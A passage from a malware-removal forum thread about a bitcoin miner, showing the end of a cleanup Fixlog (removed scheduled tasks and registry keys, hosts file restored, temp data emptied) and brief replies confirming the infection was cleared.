HKLM\Software\Classes\CLSID\{3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B0400B46-4EE3-44BE-9C04-F436BEF5665F}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B0400B46-4EE3-44BE-9C04-F436BEF5665F}" => removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\RunCampaignManager => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{31EC4593-383C-4B64-9941-178C628FAEAF}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{31EC4593-383C-4B64-9941-178C628FAEAF}" => removed successfully
"C:\WINDOWS\System32\Tasks\kuaejfar" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\kuaejfar" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{7D591FD9-73EA-4790-8E68-404BAF098DDE}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7D591FD9-73EA-4790-8E68-404BAF098DDE}" => removed successfully
"C:\WINDOWS\System32\Tasks\{C1E14D40-9F1F-EBBD-1E08-51865EAFA95A}" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{C1E14D40-9F1F-EBBD-1E08-51865EAFA95A}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{0273991C-90F1-49BB-A997-73BF1C769F3D}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0273991C-90F1-49BB-A997-73BF1C769F3D}" => removed successfully
"C:\WINDOWS\System32\Tasks\gcknyzn" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\gcknyzn" => removed successfully
"C:\Users\ulol\AppData\Roaming\product.dll" => not found
"C:\Users\ulol\AppData\Local\Temp\is-7QKIU.tmp\installer.tmp" => not found
Hosts restored successfully.

=========== EmptyTemp: ==========

BITS transfer queue => 10510336 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 67849688 B
Java, Flash, Steam htmlcache => 1243 B
Windows/system/drivers => 426182573 B
Edge => 1858418 B
Chrome => 813142935 B
Firefox => 264735320 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 19070 B
LocalService => 0 B
NetworkService => 410114 B
NetworkService => 0 B
defaultuser0 => 7168 B
ulol => 4353724 B

RecycleBin => 49348547671 B
EmptyTemp: => 47.4 GB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 11:30:15 ====

Re: bitcoin miner

Posted: 12 Jan 2019 11:53
by ulol
The anti-malware tool can be launched again. It looks like we succeeded!

Re: bitcoin miner

Posted: 12 Jan 2019 12:49
by Rudy
There were leftovers from the junk. Glad to hear it! :)

Re: bitcoin miner

Posted: 12 Jan 2019 12:50
by ulol
If that is everything, then thank you very much :)

Re: bitcoin miner

Posted: 12 Jan 2019 16:54
by Rudy
That is all from my side, and you are welcome! :)